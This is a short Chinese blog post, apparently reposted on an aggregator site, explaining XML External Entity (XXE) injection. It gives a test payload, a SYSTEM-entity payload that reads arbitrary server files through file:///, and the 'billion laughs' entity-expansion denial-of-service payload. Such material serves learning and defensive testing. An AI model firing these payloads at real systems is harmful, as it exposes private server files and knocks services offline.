码迷,mamicode.com
首页 > 其他好文 > 详细

XML外部实体注入(XXE)

时间:2017-12-02 11:17:24      阅读:129      评论:0      收藏:0      [点我收藏+]

标签:abc   文件   实体   ati   服务器   外部   span   安全   user   

在正式发布的2017 OWAST Top10榜单中,出现了三种新威胁:

A4:XML外部实体注入漏洞(XXE)

A8:不安全的反序列化漏洞

A10:不足的记录和监控漏洞

验证XXE:

构造请求

<?xml version="1.0" encoding="ytf-8"?>

<!DOCTYPE Anything[

<!ENTITY myentity "sectest">

]>

<forgot><username>&myentity;</username></forgot>

查看输出是否为sectest

XXE的利用代码:

1、读取服务器任意文件

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ 

<!ENTITY myentity SYSTEM "file:///location/anyfile" >]>

<abc>&myentity;</abc>

2、DDOS

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

XML外部实体注入(XXE)

标签:abc   文件   实体   ati   服务器   外部   span   安全   user   

原文地址:http://www.cnblogs.com/peterpan0707007/p/7953456.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!